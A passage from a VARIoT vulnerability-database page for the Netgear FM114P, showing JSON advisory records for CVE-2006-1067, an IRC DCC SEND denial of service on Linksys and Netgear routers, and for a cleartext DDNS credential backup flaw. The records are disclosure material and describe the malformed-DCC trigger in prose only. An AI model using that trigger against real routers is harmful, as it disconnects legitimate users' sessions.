Search criteria
15 vulnerabilities found for fm114p by netgear
VAR-200603-0053
Vulnerability from variot - Updated: 2025-04-03 22:31Linksys WRT54G routers version 5 (running VXWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. DCC SEND, or (2) a DCC SEND with an IP address, port, and file size parameter value of 0. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic. This issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users. Linksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200603-0053",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g v5",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "no",
"version": null
},
{
"model": "wrt54g v5",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wgt624",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "0"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.25"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.24"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.22"
},
{
"model": "rt-338",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "me102",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.4"
},
{
"model": "me102",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.3"
},
{
"model": "fvs318v2",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "2.4"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "2.4"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.3"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.2"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.1"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.0"
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "dg834g",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "dg834 adsl firewall router",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "publisher 3f",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20021.40"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "4.70.6"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "4.50.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "wap55ag",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.0.7"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.2"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.3"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.42.7"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.40.3"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.9"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"model": "etherfast befvp41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "etherfast befvp41 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7"
},
{
"model": "etherfast befsr81 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.05.00"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befn2ps4 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4.3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4.2.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.4"
},
{
"model": "befvp41 .3f",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2"
},
{
"model": "befsr81",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41w",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1"
},
{
"model": "befn2ps4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befcmu10",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "wrt54g v5",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ryanmeyer14@netscape.net discovered this issue. Both ryanmeyer14@netscape.net and \"Cade Cairns\" \u003ccairnsc@gmail.com\u003e disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.9
},
"cve": "CVE-2006-1067",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2006-1067",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2006-1318",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-17175",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-1067",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2006-1318",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200603-107",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-17175",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G routers version 5 (running VXWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. DCC SEND, or (2) a DCC SEND with an IP address, port, and file size parameter value of 0. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic. \nThis issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users. \nLinksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "VULHUB",
"id": "VHN-17175"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-1067",
"trust": 2.8
},
{
"db": "BID",
"id": "16954",
"trust": 2.6
},
{
"db": "BUGTRAQ",
"id": "20060306 RE: LINKSYS ROUTER + IRC DOS",
"trust": 1.2
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2006-1318",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20060304 VARIOUS ROUTER DOS",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060303 LINKSYS ROUTER + IRC DOS",
"trust": 0.6
},
{
"db": "XF",
"id": "25230",
"trust": 0.6
},
{
"db": "IVD",
"id": "CCDF0954-2354-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-17175",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"id": "VAR-200603-0053",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
}
],
"trust": 1.54265735
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
}
]
},
"last_update_date": "2025-04-03T22:31:29.338000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/16954"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/426863/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.hm2k.org/news/1141413208.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426761/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426756/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426934/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25230"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426934/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426761/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426756/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/25230"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/support_main.asp"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/426761"
},
{
"trust": 0.3,
"url": "/archive/1/426756"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-07T00:00:00",
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"date": "2006-03-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"date": "2006-03-07T00:00:00",
"db": "VULHUB",
"id": "VHN-17175"
},
{
"date": "2006-03-04T00:00:00",
"db": "BID",
"id": "16954"
},
{
"date": "2006-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"date": "2006-03-07T22:06:00",
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"date": "2018-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-17175"
},
{
"date": "2016-07-06T14:40:00",
"db": "BID",
"id": "16954"
},
{
"date": "2006-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-107"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Multiple router denial of service vulnerability",
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.8
}
}
VAR-200212-0872
Vulnerability from variot - Updated: 2025-04-03 22:21Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information. FM114P is an integrated HUB, print service, wireless access point, firewall and IDS hardware solution developed by Netgear. It includes Cable / DSL Prosafe 802.11b wireless firewall system.
Netgear FM114P Cable / DSL Prosafe 802.11b wireless firewall stores plain text account information during backup operations. Remote attackers can use this vulnerability to obtain account data to further attack the system.
When the FM114P Cable / DSL Prosafe 802.11b wireless firewall is configured for backup operation, the device will save the DDNS (DynDNS) account data in the system in clear text. A remote attacker can obtain account information by accessing this file to help the attacker further attack the WEB interface.
It must be noted that the backup configuration option is not enabled by default
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200212-0872",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fm114p",
"scope": "eq",
